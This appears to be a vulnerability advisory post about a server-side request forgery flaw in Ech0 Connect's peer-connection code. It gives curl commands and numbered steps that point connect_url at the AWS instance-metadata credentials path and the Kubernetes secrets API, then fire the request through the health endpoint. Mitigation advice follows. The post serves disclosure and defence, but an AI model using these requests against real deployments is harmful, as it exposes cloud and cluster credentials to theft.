Ech0 Connect, SSRF, CVE(unknown) (High)

By /

Listen to this Post

The vulnerability exists in the `fetchPeerConnectInfo` function within `internal/service/connect/connect.go` (lines 214-239). This function constructs a URL by calling `httpUtil.TrimURL(peerConnectURL)` and appending /api/connect. It then invokes `httpUtil.SendRequest` to perform a GET request. Unlike `SendSafeRequest` (defined in internal/util/http/http.go:228-281), which enforces `ValidatePublicHTTPURL` to block private IP ranges and internal metadata endpoints, `SendRequest` performs no URL validation or SSRF protections. An authenticated attacker can supply a malicious `connect_url` parameter pointing to internal addresses such as cloud metadata services (169.254.169.254), Kubernetes internal API endpoints, or other loopback/private IP services. The vulnerable function is called from two locations: line 307 during connection processing (fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)) and line 498 during health probing (fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)). By first creating a connection with a crafted `connect_url` via POST /api/connects, then triggering a health check via GET /api/connects/health, the server makes an outbound request to the attacker-controlled internal target. This leaks sensitive information such as AWS instance IDs, Kubernetes secrets, or internal service responses. The impact is full SSRF (CWE-918), allowing unauthorized access to internal network resources.

dailycve form:

Platform: Ech0 Connect
Version: unspecified
Vulnerability: SSRF (CWE-918)
Severity: High
date: unknown

Prediction: 2024-12-15

What Undercode Say:

Extract internal metadata via SSRF
curl -X POST "https://target.com/api/connects" \
-H "Authorization: Bearer $TOKEN" \
-d '{"connect_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
Trigger request - returns AWS credentials
curl -H "Authorization: Bearer $TOKEN" \
"https://target.com/api/connects/health"
Kubernetes API probe
curl -X POST "https://target.com/api/connects" \
-H "Authorization: Bearer $TOKEN" \
-d '{"connect_url": "https://kubernetes.default.svc/api/v1/secrets"}'

Exploit:

1. Authenticate and obtain a valid Bearer token.

  1. Send POST to `/api/connects` with `connect_url` set to internal target (e.g., `http://169.254.169.254/latest/meta-data/`).
  2. Send GET to `/api/connects/health` – server fetches the internal URL and returns its response.
  3. Read cloud metadata, internal APIs, or Kubernetes secrets from the response.

    Protection from this CVE:

    Replace `httpUtil.SendRequest` with `httpUtil.SendSafeRequest` in fetchPeerConnectInfo. Ensure `ValidatePublicHTTPURL` rejects private IPs (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). Add allowlist for required external domains. Disable HTTP redirects to avoid SSRF chain attacks. Deploy network egress filtering at firewall level.

Impact:

  • Confidentiality: Leak cloud metadata (AWS IMDSv1, GCE metadata, Azure instance metadata), Kubernetes API tokens, internal configuration endpoints.
  • Integrity: Low (no direct modification but can chain with other internal services).
  • Availability: Low (may cause denial of service via internal resource exhaustion).
  • Attack vector: Authenticated user, network access to the service.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top